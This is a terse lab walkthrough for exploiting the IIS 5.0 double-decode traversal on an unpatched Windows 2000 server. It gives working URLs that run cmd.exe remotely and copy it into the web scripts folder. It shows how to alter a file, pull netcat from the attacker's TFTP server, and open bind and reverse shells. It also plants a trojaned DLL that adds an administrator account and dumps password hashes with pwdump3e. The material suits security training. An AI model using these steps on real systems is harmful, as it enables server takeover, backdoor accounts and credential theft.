http://www.securityfocus.com/bid/1806/

Lab:
Victim:   192.168.0.235 (unpatched Windows 2000 server, IIS 5.0)
Attacker: 192.168.0.212 (XP SP1)

--------------
Gain CMD access to run commands

Each "..%%35%63../" hop is a double-encoded "..\..": IIS decodes %%35%63 to %5c on its first pass (after the path check has already run) and to "\" on the second, so the request walks out of c:\inetpub\scripts to c:\winnt\system32\cmd.exe. The URLs below therefore rely on the superfluous-decode variant of the IIS traversal (MS01-026); a server patched only against the Unicode form (%c0%af, MS00-078) still accepts them.

http://192.168.0.235/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\

Copy cmd.exe into the scripts directory so later requests can call it directly, without the traversal:
http://192.168.0.235/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe
http://192.168.0.235/scripts/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\inetpub\scripts
http://192.168.0.235/scripts/cmd1.exe?/c+dir
http://192.168.0.235/scripts/cmd1.exe?/c+dir+c:\

Check which account the commands run as (the traversal resolves to c:\whoami.exe on the victim):
http://192.168.0.235/scripts/..%%35%63../..%%35%63../..%%35%63../whoami.exe?

--------------
Hack - read and modify the secret file in the root of c:\

http://192.168.0.235/scripts/cmd1.exe?/c+type+c:\secret.txt
http://192.168.0.235/scripts/cmd1.exe?/c+echo+%20-%20Nice%20to%20Know!%20/Hacker+>>+c:\secret.txt

--------------
Hack - TFTP

Pull nc.exe from the attacker's TFTP server (serving c:\tftp-root) into the scripts directory:
http://192.168.0.235/scripts/cmd1.exe?/c+tftp%20-i%20192.168.0.212%20get%20nc.exe%20c:\inetpub\scripts\nc.exe

Bind shell (victim listens, attacker connects in); the spaces in the nc arguments are sent as %20 or + like the requests above:
http://192.168.0.235/scripts/cmd1.exe?/c+nc -l -p 53 -t -e cmd.exe
c:\tftp-root\nc.exe 192.168.0.235 53

Reverse shell (attacker listens first, victim connects out):
c:\tftp-root\nc.exe -l -p 80
http://192.168.0.235/scripts/cmd1.exe?/c+nc.exe -v -e cmd.exe 192.168.0.212 80

--------------
Escalate privileges

From the shell obtained above, fetch the trojaned idq.dll into the scripts directory, then trigger it from the attacker with ispc.exe:
tftp -i 192.168.0.212 get idq.dll c:\inetpub\scripts\idq.dll
C:\TFTP-Root\ispc.exe 192.168.0.235/scripts/idq.dll 80

--------------
Add user

http://192.168.0.235/scripts/idq.dll
Requesting the hacked DLL makes it create a new user on the server: "iisuser" / "abcd1234", added to the victim's Administrators group.

net use \\192.168.0.235\c$ "abcd1234" /U:"iisuser"

--------------
Grab SAM

net use \\192.168.0.235\admin$ "abcd1234" /U:"iisuser"
c:\TFTP-Root\pwdump3e\pwdump3e \\192.168.0.235 c:\samdump.txt

--------------
EOF
-------------